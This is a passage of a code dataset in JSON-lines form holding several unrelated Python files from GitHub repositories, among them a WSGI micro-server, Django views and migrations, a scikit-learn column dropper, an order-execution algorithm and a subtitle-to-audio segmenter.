self.PARAM_CONTENT, client_content))\n response = self.get_app_info()\n elif (client_cmd == self.CMD_HELLO):\n print('-> Request(3): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = 'Hello client connecting from: ' + client_ip + '\\n'\n elif (client_cmd == self.CMD_QUIT):\n print('-> Request(4): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = 'Server shutdown\\n'\n self.log.critical('Server shutdown (QUIT command)') # log only on QUIT request (not Ctrl+C)\n\n # immediate shutdown without responding to 'quit' request\n # shutdown('QUIT command') # perform all internal cleanup\n # os._exit(0) # force exit Python immediately (WSGI loop catches sys.exit())\n else:\n print('Client dropped (invalid request command)')\n raise Exception # drop client with no message in response\n \n # output: produce result (for valid requests)\n status = '200 OK'\n headers = [('Content-Type','text/plain'),('Content-Length',str(len(response)))] \n start_response(status,headers)\n res = [bytes(response.encode('UTF-8'))]\n\n # report lap timer in console window and return result (http)\n print('-> Request served in ' + str((time.time_ns()-t0)/1e6) + ' msec')\n if (client_cmd == self.CMD_QUIT):\n raise SystemExit # raise 'exit' 
exception after returning the response\n else:\n return res \n\n except SystemExit: # normal shutdown after responding to 'quit' request\n shutdown('QUIT command') # perform all internal cleanup\n os._exit(0) # force exit Python immediately (WSGI loop catches sys.exit())\n\n except Exception:\n status = '500 Internal Server Error'\n headers = [('Content-Type','text/plain')]\n start_response(status, headers, sys.exc_info())\n return [b'Server Error\\n']\n\n\ndef shutdown( str_reason ):\n '''Cleanup actions before WSGI server shutdown'''\n print('\\nShutting down (%s)...' % str_reason)\n\n\ndef main():\n '''Main WSGI server initialization and service'''\n # fetch application tag and version info\n ver_list = app_info.read_version_json('version.json')\n # initialize application server instance\n app = AppServices(app_name=ver_list[0], app_version=ver_list[1]+' (build: '+ver_list[2]+')', \n app_copyright='Harris Georgiou (c) 2021, Licence: CC-BY-NC-SA/4.0i',\n app_config='cfg/settings.cfg')\n # fetch command-line options\n app.init_opt()\n # print full intro if not in 'help' or 'version' options\n print(app.get_app_info(),'\\n') \n print(app.get_sys_info(),'\\n') \n\n # fetch full configuration\n app.init_cfg(app.opt['cfgfile']) # static argument (app-specific), everything else is in there\n print('configuration: ', app.opt['cfgfile'])\n\n # initialize logging\n if (app.opt['verbose'] and not app.opt['quiet']): # only 'verbose' given\n app.log_level = 'DEBUG'\n elif (not app.opt['verbose'] and app.opt['quiet']): # only 'quiet' given\n app.log_level = 'CRITICAL'\n else: # ignore if both 'verbose' and 'quiet' are used\n app.log_level = app.cfg['logging']['level']\n # size-based rotation:\n app.init_log_sizeR(app.cfg['logging']['filename'], app.log_level, app.cfg['logging']['maxBytes'], app.cfg['logging']['backupCount'])\n # time-based rotation:\n #app.init_log_timeR(app.cfg['logging']['filename'], app.cfg['logging']['level'], app.cfg['logging']['when'], app.cfg['logging']['interval'], app.cfg['logging']['backupCount'])\n print('logging file: %s (level=%s)' % (app.cfg['logging']['filename'], app.log_level))\n #print('logging level: ', app.log.getEffectiveLevel())\n\n #print('\\ntype(ip_allow) = ',type(app.cfg['network']['ip_allow']))\n #print('len(ip_allow) = ',len(app.cfg['network']['ip_allow']))\n #print('ip_allow = ',app.cfg['network']['ip_allow'])\n #ip_allow_list = app.cfg['network']['ip_allow'].strip('][').split(',')\n app.ip_allow_list = app.cfg['network']['ip_allow'].replace(' ','').strip('][').split(',')\n #print('\\ntype(ip_allow_list) = ',type(ip_allow_list))\n #print('len(ip_allow_list) = ',len(ip_allow_list))\n print('IP allowed list: ',app.ip_allow_list)\n app.svr_port = int(app.cfg['network']['svr_port'])\n print('Server listening at port %d\\n' % app.svr_port)\n app.log.debug('Server initialized, listening port %d' % app.svr_port)\n\n # Main WSGI server loop\n try:\n httpd = make_server('localhost', app.svr_port, app.wsgi_app)\n print('Serving at port %d...' 
% app.svr_port)\n httpd.serve_forever()\n except KeyboardInterrupt: # User break (Ctrl+C) in the console\n shutdown('KeyboardInterrupt')\n\n\nif __name__ == '__main__': \n main() # stub for calling the main loop\n","repo_name":"xgeorgio/dev","sub_path":"microsvr-base/micro_svr.py","file_name":"micro_svr.py","file_ext":"py","file_size_in_byte":11544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70342703849","text":"import traceback\nfrom io import BytesIO\nfrom typing import Generator\nfrom zipfile import ZipFile, BadZipFile\n\nclass TimeoutError(Exception):\n def __init__(self, value):\n self.value = value\n\ndef _handle_timeout(signum, frame):\n raise TimeoutError('[*] Request timed out')\n\ndef unzip_request_content(content: [str, bytes]) -> [ZipFile, None]:\n if not content:\n return\n\n try:\n unzipped_file = ZipFile(BytesIO(content))\n return unzipped_file\n except BadZipFile:\n traceback.print_exc(limit=1)\n\ndef parse_row(unzipped_file: ZipFile) -> [str, None]:\n if not unzipped_file:\n return\n\n for file in unzipped_file.namelist():\n for row in unzipped_file.open(file).readlines():\n yield row.decode()\n\ndef parse_url(raw_url: [str, Generator[str, int, bytes]]) -> [str, None]:\n if not raw_url:\n return\n\n try:\n if not isinstance(raw_url, str):\n raw_url = next(raw_url)\n\n row, url = raw_url.split(',')\n return url.replace('\\n', '')\n except (UnicodeDecodeError, ValueError):\n traceback.print_exc(limit=1)","repo_name":"Leovilhena/pbjs-evaluator","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25556714915","text":"import numpy as np\n\nA=(61,41,59,26,41,58)\nA=np.asarray(A)\nprint(A)\nprint(len(A))\n\n#ordena A en forma descendente\n#key=np.zeros((len(A)))\nfor j in range(1,len(A)):\n key=A[j]\n i=j-1\n while (i>=0) and (A[i]>key):\n A[i+1]=A[i]\n i=i-1\n A[i+1]=key\n\nprint('A ordenado descendiente es:',A)\n\n\n\n#ahora vamos a ordenar en forma descendiente\nA=(31,41,59,26,41,58)\nA=np.asarray(A)\nfor j in range(0,len(A)):\n key=A[j]\n i=j-1\n while (i>=0) and (A[i] 3:\r\n self._error = True\r\n self._logger.append(\"Invalid ICD code\")\r\n return\r\n if not re.match('^[a-zA-z]{1}[0-9]{2}(\\.)?(?(1)([0-9]{1,3}|[0-9]{1,3}[a-zA-Z]{1,}))$' , self._icd_value):\r\n self._error = True\r\n self._logger.append(\"Invalid ICD code\")\r\n return\r\n\r\n def get_icd_data(self):\r\n result = get_dump_record(self._icd_value)\r\n if result:\r\n self._result[\"Response\"] = 'True'\r\n self._result[\"Code\"] = self._icd_value\r\n self._result[\"Description\"] = result\r\n self._result[\"Mode\"] = 'dump'\r\n if len(self._icd_value) > 3 and '.' 
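To exercise the WSGI micro-server above, a client only needs the documented command/content query parameters. A minimal standard-library sketch, assuming the server listens on localhost with the port configured in settings.cfg (15387 in the example URL embedded in the source):

from urllib.parse import urlencode
from urllib.request import urlopen

def call_micro_svr(command, content='', host='localhost', port=15387):
    # builds e.g. http://localhost:15387?command=ECHO&content=someone
    qs = urlencode({'command': command, 'content': content})
    with urlopen('http://%s:%d?%s' % (host, port, qs)) as resp:
        return resp.read().decode('utf-8')

print(call_micro_svr('HELLO'))            # greeting that echoes the client IP
print(call_micro_svr('ECHO', 'someone'))  # returns 'someone'
print(call_micro_svr('VER'))              # application/version banner

Note that a QUIT request makes the server call os._exit(0) before the response body is flushed, so the client should expect a dropped connection rather than the 'Server shutdown' text.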
not in self._icd_value:\r\n self._result[\"Code\"] = self._icd_value[:3] + \".\" + self._icd_value[3:]\r\n\r\n def run_dump(self):\r\n self.get_gen_icd()\r\n if not self._error:\r\n self.get_icd_data()\r\n return self._result\r\n\r\n def run_api(self):\r\n if not self._error and self._result.get('Response') == 'False':\r\n self._result = extractapi(self._icd_value)\r\n if self._result.get('Response') == 'True':\r\n self._result = insert_dump_record(self._result)\r\n return self._result\r\n","repo_name":"iparkavan/Health-Care-Project","sub_path":"MedicalFormExtractor/entities_analysis/xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36885356594","text":"import dataclasses\r\n\r\nfrom pointevector.zip import exceptions\r\n\r\nMAGIC = b\"PK\\x06\\x07\"\r\n_STATIC_SIZE_ = 20\r\n\r\n\r\n@dataclasses.dataclass(frozen=True)\r\nclass Zip64EOCDLocator:\r\n zip64_eocd_start_disk: int\r\n zip64_eocd_offset: int\r\n total_disks: int\r\n\r\n @classmethod\r\n def from_memoryview(cls, view: memoryview):\r\n if view.nbytes < _STATIC_SIZE_:\r\n raise exceptions.IncompleteParse()\r\n\r\n if view[:4] != MAGIC:\r\n raise exceptions.BadMagic(view[:4].tobytes())\r\n\r\n return cls(\r\n zip64_eocd_start_disk=int.from_bytes(view[4:8], byteorder=\"little\"),\r\n zip64_eocd_offset=int.from_bytes(view[8:16], byteorder=\"little\"),\r\n total_disks=int.from_bytes(view[16:20], byteorder=\"little\"),\r\n )\r\n\r\n def __len__(self):\r\n return _STATIC_SIZE_\r\n","repo_name":"Pointe-Vector/zip","sub_path":"pointevector/zip/_zip64_eocd_locator.py","file_name":"_zip64_eocd_locator.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24197716091","text":"from django.urls.conf import path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import LenderViewSet, LenderImportAPIView, LenderExportAPIView\n\nurlpatterns = [\n path(\n 'lenders/import/', LenderImportAPIView.as_view(), name='lender-import'\n ),\n path(\n 'lenders/export/', LenderExportAPIView.as_view(), name='lender-export'\n ),\n]\n\nrouter = DefaultRouter()\nrouter.register(r'lenders', LenderViewSet, basename='lender')\nurlpatterns += router.urls\n","repo_name":"saltysealion/finsure-challenge","sub_path":"api_v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11828870087","text":"from typing import List\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\nclass HighCardinalityDroppper(BaseEstimator, TransformerMixin):\n \"\"\"Drops high cardinality columns.\n\n Attributes:\n - threshold (float): numbers unique categories allowed per column\n expressed as the fraction respect to the number of rows.\n - exclude (list): list of columns which won't pass through this\n estimator.\n \"\"\"\n\n def __init__(self, threshold: float = 0.9, exclude: List = []) -> None:\n self.threshold = threshold\n self.exclude = exclude\n\n def _columns_dropper(self, df: pd.DataFrame) -> None:\n nrows = df.shape[0]\n\n num_uniques = df.nunique().to_frame(name=\"num_uniques\")\n\n missing_vals = num_uniques.assign(\n frac_uniques=num_uniques[\"num_uniques\"] / nrows\n )\n\n missing_vals = missing_vals[\n ~missing_vals.index.isin([\"incident_date\", \"policy_bind_date\"])\n 
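The Zip64EOCDLocator above parses the fixed 20-byte ZIP64 end-of-central-directory locator. A quick round-trip check of the little-endian field layout it implements:

import struct

# synthetic record: magic, start disk (u32), EOCD offset (u64), total disks (u32)
raw = b'PK\x06\x07' + struct.pack('<IQI', 0, 0x0123456789, 1)
locator = Zip64EOCDLocator.from_memoryview(memoryview(raw))

assert locator.zip64_eocd_start_disk == 0
assert locator.zip64_eocd_offset == 0x0123456789
assert locator.total_disks == 1
assert len(locator) == 20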
]\n\n columns_to_drop = missing_vals[\n missing_vals[\"frac_uniques\"] >= self.threshold\n ].index.values.tolist()\n\n self.selected_columns = df.columns.difference(columns_to_drop)\n\n def get_columns(self) -> List[str]:\n \"\"\"Gets the list of remaining columns after the estimator is applied.\n\n Returns:\n List[str]: list of non-dropped columns.\n \"\"\"\n return self.selected_columns.tolist()\n\n def fit(self, X: pd.DataFrame, y=None):\n \"\"\"Fits the values to replace by using 'transform' method.\n Args:\n X (pd.DataFrame): input data\n \"\"\"\n self._columns_dropper(X)\n return self\n\n def transform(self, X: pd.DataFrame, y=None) -> pd.DataFrame:\n \"\"\"Executes the methods to transform each type of column.\n Args:\n X (pd.DataFrame): input dataframe\n Returns:\n pd.DataFrame: Dataframe with imputed values.\n \"\"\"\n return X[self.selected_columns]\n","repo_name":"nelsoncardenas/sklearn-dataframes-practice","sub_path":"column_transformer_TP_talk/src/high_cardinality_dropper.py","file_name":"high_cardinality_dropper.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24085685729","text":"from urllib import response\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseNotFound, Http404\nfrom django.template.loader import render_to_string\n\n# Create your views here.\n\nmonthly_challenges = {\n \"january\" : \"Work Hard! in january.\",\n \"february\" : \"Work Hard! in february.\",\n \"march\" : \"Your Birthday! Lets celebrate.\",\n \"april\" : \"Work Hard! in april.\",\n \"may\" : \"Work Hard! in may.\",\n \"june\" : \"Work Hard! in june.\",\n \"july\" : \"Work Hard! in july.\",\n \"august\" : \"Work Hard! in august.\",\n \"september\" : \"Work Hard! in september.\",\n \"october\" : \"Work Hard! in october.\",\n \"november\" : \"Work Hard! 
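Because HighCardinalityDroppper follows the scikit-learn estimator contract (fit/transform via TransformerMixin), it composes directly with pipelines. A small illustrative run with made-up data:

import pandas as pd

df = pd.DataFrame({
    'id': ['a', 'b', 'c', 'd'],     # 4/4 unique -> at the 0.9 threshold, dropped
    'city': ['x', 'x', 'y', 'y'],   # 2/4 unique -> kept
    'amount': [1.0, 2.0, 2.0, 3.0]  # 3/4 unique -> kept
})

dropper = HighCardinalityDroppper(threshold=0.9)
out = dropper.fit_transform(df)
print(dropper.get_columns())  # ['amount', 'city'] (Index.difference sorts names)
print(out.shape)              # (4, 2)

One caveat: the exclude argument is stored but never consulted; what _columns_dropper actually exempts is the hard-coded ['incident_date', 'policy_bind_date'] pair, which looks dataset-specific.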
in november.\",\n \"december\" : None,\n}\n\ndef home(request):\n months = list(monthly_challenges.keys())\n for i in range(len(months)):\n months[i]=months[i].capitalize()\n return render(request, 'challenges/index.html',{\n 'months_list' : months\n })\n\ndef index_num(request,month):\n months = list(monthly_challenges.keys())\n\n if month<=len(months) and month>=1:\n return redirect('index-page', month=months[month-1])\n else:\n response_data = render_to_string('challenges/404.html')\n return HttpResponseNotFound(response_data)\n\ndef index(request,month):\n \n months = list(monthly_challenges.keys())\n if month not in months and month.lower() not in months:\n response_data = render_to_string('challenges/404.html')\n return HttpResponseNotFound(response_data)\n\n challenge_text = monthly_challenges.get(month)\n if challenge_text == None:\n challenge_text = monthly_challenges.get(month.lower())\n\n return render(request, 'challenges/challenge.html', {\n 'month' : month,\n 'text' : challenge_text\n })\n\n\n","repo_name":"SaiAnveshKanchi/Monthly_Challenges","sub_path":"challenges/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24296611314","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userinfo', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ToEmail',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('daiorny', models.IntegerField(default=1, choices=[(1, 'daily'), (2, 'harryny')])),\n ('touser', models.ForeignKey(to='userinfo.UserInfo', verbose_name='收件人', related_name='recivea')),\n ('user', models.ForeignKey(to='userinfo.UserInfo', verbose_name='项目经理', related_name='managera')),\n ],\n ),\n ]\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/sendemail/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35686445164","text":"##Libraries\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\n##Simulation Engine\nfrom simulation_engine import simulation\n\n\nclass gbm:\n\n ##Constructor function\n def __init__(self, num_shares, algo_params={'window_length':15,'T':375,'T_0':100,'VAR_Q':0.995,'p1':0.01,'p2':0.1,'p3':200}):\n self.T = algo_params['T'] - (2*algo_params['window_length'])\n self.X = num_shares\n self.T_0 = algo_params['T_0']\n self.carry_forward = 0\n self.window_length = algo_params['window_length']\n self.p1 = algo_params['p1']\n self.p2 = algo_params['p2']\n self.p3 = algo_params['p3']\n self.var = algo_params['VAR_Q']\n self.last_x_t = num_shares\n self.last_order = 0\n\n #To estiamte : eta(temp impact), sigma(brownian motion),\n def __estimate_parameters(self, price, high, low, volume):\n ##sigma estimation\n price = [np.log(x) for x in price]\n diff = np.diff(price)\n diff = [i**2 for i in diff]\n sigma = np.sqrt(2*(np.sqrt(np.mean(diff)+1)-1))\n ##eta estimation\n bid_ask_spread = np.mean(high) - np.mean(low)\n avg_volume = np.mean(volume)\n x_t_dot = self.p3*avg_volume\n eta = (bid_ask_spread/(self.p1*avg_volume)) - (bid_ask_spread/(2*x_t_dot))\n return(sigma, eta)\n\n #Lambda hat calculation\n 
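For the monthly-challenges views above to resolve, the URL configuration must register both an integer and a string month route, and the redirect in index_num fixes the route name 'index-page'. A plausible urls.py (the path strings are assumptions; only the 'index-page' name is taken from the source):

from django.urls import path
from . import views

urlpatterns = [
    path('', views.home, name='home'),
    # the int converter matches first, so /3 dispatches to index_num
    path('<int:month>/', views.index_num, name='index-num'),
    # non-numeric values fall through to the string route, e.g. /march
    path('<str:month>/', views.index, name='index-page'),
]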
def __calculate_lambda_hat(self, sigma):\n return(1-np.exp((-sigma*np.sqrt(self.T_0)*norm.ppf(self.var))-(pow(sigma,2)*(self.T_0)/2)))\n\n def order(self, price, high, low, volume, t):\n ##updating params\n sigma, eta = self.__estimate_parameters(price, high, low, volume)\n ##calculating lambda and integral\n lamba = self.__calculate_lambda_hat(sigma)/eta\n integral = np.sum(price[self.window_length-1:])\n ##updation\n x_t = max(((self.T-t)/self.T)*((self.X)-((lamba/4)*integral)),0)\n n_t = self.last_x_t - x_t\n if(n_t>=0):\n self.last_x_t = x_t\n n_t = max(n_t,0)\n #volume correction\n final_order = np.floor(n_t+self.carry_forward)\n self.carry_forward = n_t+self.carry_forward - final_order\n ##assertions\n #assert self.carry_forward<=1\n #assert final_order>=0\n #assert final_order == int(final_order)\n ##Return Final result\n self.last_order = final_order\n #print(t, x_t, n_t, final_order)\n return(final_order)\n\n def order_update(self, unrealised):\n self.carry_forward += unrealised\n\ndata = \"../Data/NSE-EOM/ABAN/2018-05-31.csv\"\ndata = pd.read_csv(data)\nsim = simulation(data,dump_data=True)\nmet = gbm(10000)\norder_list = []\nprice_list = []\nfor i in range(15,361):\n high = list(data['High'])[:i]\n low = list(data['Low'])[:i]\n price = list(data['Close'])[:i]\n volume = list(data['Volume'])[:i]\n ord = met.order(price, high, low, volume, i-15)\n price = sim.order(ord, i)\n met.order_update(0)\n order_list.append(ord)\n price_list.append(price)\nprint(price_list)\n'''\nplt.plot(range(0,len(price_list)),data['Close'][15:361],'b')\nplt.plot(range(0,len(price_list)),price_list,'g')\n#plt.plot(range(0,len(order_list)),order_list)\n#plt.ylim([28980,28990])\n\nplt.show()\n'''\n","repo_name":"kousik97/Order-Execution-Strategy","sub_path":"Code/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"9588812940","text":"# -*- coding: utf-8 -*-\n\"\"\"\n File name: medic_tables\n Author: Edgar Arturo Haas Pacheco\n Date created: 14/7/2016\n Python Version: 2.7.11\n\"\"\"\nimport json\nimport os\n\nfrom django.core.management.base import BaseCommand\n\nfrom sigia.dev_settings import BASE_DIR\nfrom sigia.models import SigiaMedicPersonalBackgroundDetail, SigiaMedicFamilyBackgroundDetail, \\\n SigiaMedicPhysicalExamDetail, SigiaMedicDiagnosticPlanDetail, SigiaMedicCie10\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here franklin'\n user = User.objects.get(username='ahaas')\n date = timezone.now()\n\n def _create_personal_background(self):\n lista = []\n lista_detalle = ['VACUNAS', 'ENF. PRENATAL', 'ENF. INFANCIA', 'ENF. ADOLESCENCIA', 'ENF. ALÉRGICA',\n 'ENF. CARDIACA', 'ENF. RESPIRATORIA', 'ENF. DIGESTIVA', 'ENF. NEUROLÓGICA', 'ENF. METABÓLICA',\n 'ENF. HEMO LINF.', 'ENF. URINARIA', 'ENF. TRAUMÁTICA',\n 'ENF. QUIRÚRGICA', 'ENF. MENTAL', 'ENF. TRANGM SEX', 'TENDENCIA SEXUAL', 'RIESGO SOCIAL',\n 'RIESGO LABORAL', 'RIESGO FAMILIAR', 'ACTIVIDAD FÍSICA', 'DIETA Y HÁBITOS',\n 'RELIGION Y CULTURA', 'OTRO', 'MENARQUA', 'MENOPAUSIA', 'CICLOS', 'VIDA SEXUAL ACTIVA',\n 'GESTA', 'PARTOS', 'ABORTOS', 'CESÁREAS', 'HIJOS VIVOS', 'FUM', 'FUP', 'FUC', 'BIOCOPIA',\n 'MÉTODO DE P. 
FAMILIAR', 'TERAPIA HORMONAL', 'COLPOS COPIA', 'MAMOGRAFÍA']\n for detalle in lista_detalle:\n lista.append(SigiaMedicFamilyBackgroundDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user,\n modified_by=self.user))\n SigiaMedicPersonalBackgroundDetail.objects.bulk_create(lista)\n\n def _create_family_background(self):\n lista = []\n lista__detalle = ['CARDIOPATÍA', 'DIABETES', 'ENF. C. VASCULAR', 'HIPERTENSIÓN', 'CANCER', 'TUBERCULOSIS',\n 'ENF. MENTAL', 'ENF. INFECCIOSA', 'MALFORMACIÓN', 'OTRO']\n for detalle in lista__detalle:\n lista.append(SigiaMedicFamilyBackgroundDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicFamilyBackgroundDetail.objects.bulk_create(lista)\n\n def _create_physical_background(self):\n lista = []\n lista_detalle1 = ['PIEL Y FANERAS', 'CABEZA', 'OJOS', 'OÍDOS', 'NARIZ', 'BOCA', 'ORO FARINGE', 'CUELLO',\n 'AXILAS - MAMAS', 'TÓRAX', 'ABDOMEN', 'COLUMNA VERTEBRAL', 'INGLE PERINE',\n 'MIEMBROS SUPERIORES', 'MIEMBROS SUPERIORES', 'ÓRGANO DE LOS SENTIDOS', 'RESPIRATORIO',\n 'CARDIO VASCULAR', 'DIGESTIVO', 'GENITAL', 'URINARIO', 'MUSCULO ESQUELÉTICO', 'ENDOCRINO',\n 'HEMO LINFÁTICO', 'NEUROLÓGICO']\n for detalle in lista_detalle1:\n lista.append(SigiaMedicPhysicalExamDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicPhysicalExamDetail.objects.bulk_create(lista)\n\n def _create_diagnostic_background(self):\n lista = []\n lista_detalle2 = ['BIOMETRÍA', 'UROANALISIS', 'QUÍMICA BAN..', 'ELECTROLITOS', 'GASOMETRÍA',\n 'ELECTRO CARDIOGRAMA', 'ENDOSCOPIA', 'R-X TÓRAX', 'R-X ABDOMEN', 'R-X ÓSEA', 'TOMOGRAFÍA',\n 'RESONANCIA', 'ECOGRAFÍA PÉLVICA', 'ECOGRAFÍA ABDOMEN', 'INTERCONSULTA', 'OTROS', 'NO APLICA']\n for detalle in lista_detalle2:\n lista.append(SigiaMedicDiagnosticPlanDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicDiagnosticPlanDetail.objects.bulk_create(lista)\n\n @staticmethod\n def _create_cie10_rows():\n lista = []\n base = os.path.dirname(os.path.dirname(__file__))\n data = open(BASE_DIR + '\\sigia\\static\\data\\cie10.json').read()\n json_data = json.loads(data)\n for row in json_data:\n lista.append(SigiaMedicCie10(id=row['c'], detail=row['d']))\n SigiaMedicCie10.objects.bulk_create(lista)\n\n def handle(self, *args, **options):\n self._create_personal_background()\n self._create_family_background()\n self._create_physical_background()\n self._create_diagnostic_background()\n self._create_cie10_rows()\n","repo_name":"Oriphiel/sigia","sub_path":"sigia/management/commands/medic_tables.py","file_name":"medic_tables.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14305520847","text":"# -*- coding: utf-8 -*-\nfrom optparse import OptionParser\nimport os\nimport sys\nimport re\nimport csv\nfrom datetime import datetime, date, time, timedelta\nimport pysrt\nfrom pydub import AudioSegment\nfrom proscript.proscript import Word, Proscript, Segment\nfrom proscript.utilities import utils\n\n#CONSTANTS\nSENTENCE_END_MARKS = ['.', '?', '!', ':', '...']\n\ndef checkArgument(argname, isFile=False, isDir=False, createDir=False):\n\tif not argname:\n\t\treturn False\n\telse:\n\t\tif isFile and not os.path.isfile(argname):\n\t\t\treturn False\n\t\tif isDir:\n\t\t\tif not os.path.isdir(argname):\n\t\t\t\tif 
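Two details in the medic_tables command above are worth flagging: _create_personal_background instantiates SigiaMedicFamilyBackgroundDetail objects but bulk_creates them through SigiaMedicPersonalBackgroundDetail (a model mix-up), and _create_cie10_rows glues a Windows-style backslash path onto BASE_DIR, which breaks on other platforms. Hedged corrections, with the long list literals elided:

import json
import os

def _create_personal_background(self):
    # build instances of the *personal* model, matching the bulk_create target
    rows = [SigiaMedicPersonalBackgroundDetail(
                detail=detalle, created=self.date, modified=self.date,
                created_by=self.user, modified_by=self.user)
            for detalle in lista_detalle]  # lista_detalle as in the original
    SigiaMedicPersonalBackgroundDetail.objects.bulk_create(rows)

@staticmethod
def _create_cie10_rows():
    # portable path construction instead of concatenating a backslash string
    path = os.path.join(BASE_DIR, 'sigia', 'static', 'data', 'cie10.json')
    with open(path, encoding='utf-8') as f:
        json_data = json.load(f)
    SigiaMedicCie10.objects.bulk_create(
        [SigiaMedicCie10(id=row['c'], detail=row['d']) for row in json_data])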
createDir:\n\t\t\t\t\tprint(\"Creating directory %s\"%(argname))\n\t\t\t\t\tos.makedirs(argname)\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\treturn True\n\ndef cutAudioWithPydub(audio_segment, start_time, end_time, outputfile):\n\textract = audio_segment[start_time*1000:end_time*1000]\n\textract.export(outputfile, format=options.audioformat)\n\ndef extract_audio_segments(proscript, audio_segment, output_dir, file_prefix=\"\"):\n\t'''\n\tCuts each segment and outputs as wav+transcript\n\t'''\n\tfor segment in proscript.segment_list:\n\t\tfileId=\"%s%04d\"%(file_prefix, segment.id)\n\n\t\tsegmentAudioFile = \"%s/%s_audio.wav\"%(output_dir, fileId)\n\t\tsubScriptFile = \"%s/%s_sub.txt\"%(output_dir, fileId)\n\n\t\tcutAudioWithPydub(audio_segment, segment.start_time, segment.end_time, segmentAudioFile)\n\n\t\t#write subtitle text to a separate file\n\t\twith open(subScriptFile, 'w') as f:\n\t\t\tf.write(segment.transcript)\n\ndef subriptime_to_seconds(srTime):\n\t'''\n\tConvert SubRipTime object to seconds\n\t'''\n\tt = datetime.combine(date.min, srTime.to_time()) - datetime.min\n\treturn t.total_seconds()\n\ndef normalize_transcript(transcript):\n\t'''\n\tAll text normalization here\n\t'''\n\ttranscript = re.sub('\\n', ' ', transcript)\n\treturn transcript\n\ndef to_proscript(srt_data):\n\tproscript = Proscript()\n\n\tsegment_count = 0\n\tfirst_utterance = True\n\n\tfor index, srt_entry in enumerate(srt_data):\n\t\tstart_time = subriptime_to_seconds(srt_entry.start)\n\t\tend_time = subriptime_to_seconds(srt_entry.end)\n\n\t\ttranscript = srt_entry.text_without_tags.strip()\n\n\t\tif options.merge_to_sentences:\n\t\t\t#merges subtitle entries to complete sentences. The srt needs to be well punctuated\n\t\t\tif transcript and not transcript.isspace():\n\t\t\t\tif first_utterance:\n\t\t\t\t\tcurr_seg = Segment()\n\t\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\t\tcurr_seg.transcript += transcript\n\t\t\t\t\tfirst_utterance = False\n\t\t\t\telif curr_seg.transcript[-1] in SENTENCE_END_MARKS:\n\t\t\t\t\tif curr_seg.transcript and not curr_seg.transcript.isspace():\n\t\t\t\t\t\tsegment_count += 1\n\t\t\t\t\t\tcurr_seg.id = segment_count\n\t\t\t\t\t\tcurr_seg.transcript = normalize_transcript(curr_seg.transcript)\n\t\t\t\t\t\tproscript.add_segment(curr_seg)\n\t\t\t\t\t\t# print(\"----====----\")\n\t\t\t\t\t\t# curr_seg.to_string()\n\t\t\t\t\t\t# print(\"----====----\")\n\t\t\t\t\tcurr_seg = Segment()\n\t\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\t\tcurr_seg.transcript += transcript\n\t\t\t\t\t#print(\"curr_seg:\\n%s\"%curr_seg.transcript)\n\t\t\t\telse:\n\t\t\t\t\tcurr_seg.end_time = subriptime_to_seconds(srt_entry.end)\n\t\t\t\t\tcurr_seg.transcript += ' ' + transcript\n\t\t\t\t\t#print(\"curr_seg:\\n%s\"%curr_seg.transcript)\n\n\t\t\tif index == len(srt_data) - 1:\n\t\t\t\tif curr_seg.transcript and not curr_seg.transcript.isspace():\n\t\t\t\t\tsegment_count += 1\n\t\t\t\t\tcurr_seg.id = segment_count\n\t\t\t\t\tcurr_seg.transcript = normalize_transcript(transcript)\n\t\t\t\t\tproscript.add_segment(curr_seg)\n\t\t\t\t\t# 